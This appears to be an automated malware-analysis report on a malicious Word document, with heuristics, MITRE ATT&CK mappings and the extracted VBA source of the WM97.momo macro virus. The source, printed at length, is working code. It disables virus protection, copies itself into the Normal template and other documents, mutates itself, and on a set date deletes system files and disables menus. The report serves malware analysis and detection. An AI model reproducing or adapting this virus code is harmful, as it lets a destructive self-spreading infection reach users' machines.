MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-3. It contains a legacy WordBasic AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN) which is designed to execute automatically. The macro attempts to delete files from C:\WINDOWS\SYSTEM\*.* and calls another subroutine 'JoVlLr9070', suggesting a payload delivery or system disruption function. The presence of the AutoOpen macro and the malicious ClamAV detections strongly indicate a malicious document intended for initial compromise via spearphishing.
Heuristics 4
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5351 bytes |
SHA-256: f2841eb2b722198d8aeee6b3f98820dc38523f0032fe6b6dfd8055d2acb0d6f2 |
|||
|
Detection
ClamAV:
Doc.Trojan.Agnes-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "momo"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub KiCuQz3859()
' -= [LineZerO's Macro Engine 1.2] =-
' -= [WM97.momo] =-
' -= [ID: 23451-Bx-54053859-Bm.W] =-
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("momo").CodeModule.ProcCountLines("KiCuQz3859", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("momo").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
If Day(Now()) = 8 And Month(Now()) = 8 Then
Application.Username = "MOMO"
Selection.Wholestory
Selection.Cut
ActiveDocument.SaveAs ActiveDocument.FullName
Kill ("C:\WINDOWS\SYSTEM\*.*")
While ShowCursor(False) >= 0
Wend
Call JoVlLr9070
WordBasic.FileExit dlg
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub JoVlLr9070()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Bx5405()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("momo").Export "C:\momo.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.momo" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 23451-Bx-54053859-Bm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "momo" Then DgDmFu5117PwVzPp5405 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "momo" Then NhJtFj9070KiCuQz3859 = True
Next y
If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = False Then Set MiRxQx4019JoVlLr4336 = ActiveDocument.VBProject
If DgDmFu5117PwVzPp5405 = False And NhJtFj9070KiCuQz3859 = True Then Set MiRxQx4019JoVlLr4336 = NormalTemplate.VBProject
If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = True Then GoTo Ende_
MiRxQx4019JoVlLr4336.VBComponents.Import "C:\momo.sys"
If NhJtFj9070KiCuQz3859 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If DgDmFu5117PwVzPp5405 = False Then NormalTemplate.Save
Ende_:
Call KiCuQz3859
End Sub
Sub AutoOpen()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoExit()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoNew()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoExec()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Su
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.